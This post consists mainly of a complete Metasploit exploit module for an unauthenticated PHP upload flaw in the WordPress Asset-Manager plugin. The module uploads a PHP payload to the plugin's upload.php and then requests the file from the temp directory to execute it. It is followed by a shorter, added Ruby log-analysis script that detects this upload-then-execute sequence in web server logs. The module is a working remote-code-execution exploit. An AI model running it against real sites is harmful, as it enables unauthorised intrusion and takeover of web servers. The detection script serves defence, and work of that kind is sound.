This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    # Normalise the WordPress base path so the plugin paths below can be appended
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin's upload.php reads the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored file name back in the response body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
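As an added example (not part of the original post or of the Metasploit module above), the following Ruby flags in web server access logs the request sequence the module leaves behind: a POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same source address. The combined log format and the sample lines are assumptions constructed for the example.

```ruby
# Added detection example (not the module's code). Assumes Apache/Nginx
# combined log format; the sample lines below are constructed.
LOG_RE = /^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+/

# Paths used by the vulnerable plugin (from the module above)
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php$}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php$}

# Returns one alert per GET of a .php file in the temp directory that was
# preceded by a POST to upload.php from the same source IP.
def detect_asset_manager_upload(lines)
  uploaded = Hash.new { |h, k| h[k] = [] }   # ip => timestamps of upload POSTs
  alerts = []
  lines.each do |line|
    m = LOG_RE.match(line) or next
    path = m[:path].split('?', 2).first        # drop any query string
    if m[:method] == 'POST' && path =~ UPLOAD_RE
      uploaded[m[:ip]] << m[:time]
    elsif m[:method] == 'GET' && path =~ TEMP_PHP_RE && uploaded.key?(m[:ip])
      alerts << { ip: m[:ip], upload_at: uploaded[m[:ip]].last,
                  exec_path: path, status: m[:status].to_i }
    end
  end
  alerts
end

# Constructed sample: one upload-then-execute sequence, one benign client
# whose upload attempt was blocked and who only fetched an image.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:01:12 +0000] "GET /wordpress/ HTTP/1.1" 200 5123
  203.0.113.7 - - [26/May/2012:10:01:15 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87
  203.0.113.7 - - [26/May/2012:10:01:16 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxa.php HTTP/1.1" 200 0
  198.51.100.9 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 4410
  198.51.100.9 - - [26/May/2012:10:02:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 12
LOG

if __FILE__ == $0
  detect_asset_manager_upload(SAMPLE_LOG.lines).each do |a|
    puts "ALERT #{a[:ip]}: upload at #{a[:upload_at]}, then GET #{a[:exec_path]} (HTTP #{a[:status]})"
  end
end
```

Only a .php request that follows an upload from the same address is reported, so ordinary fetches of images from the temp directory stay quiet.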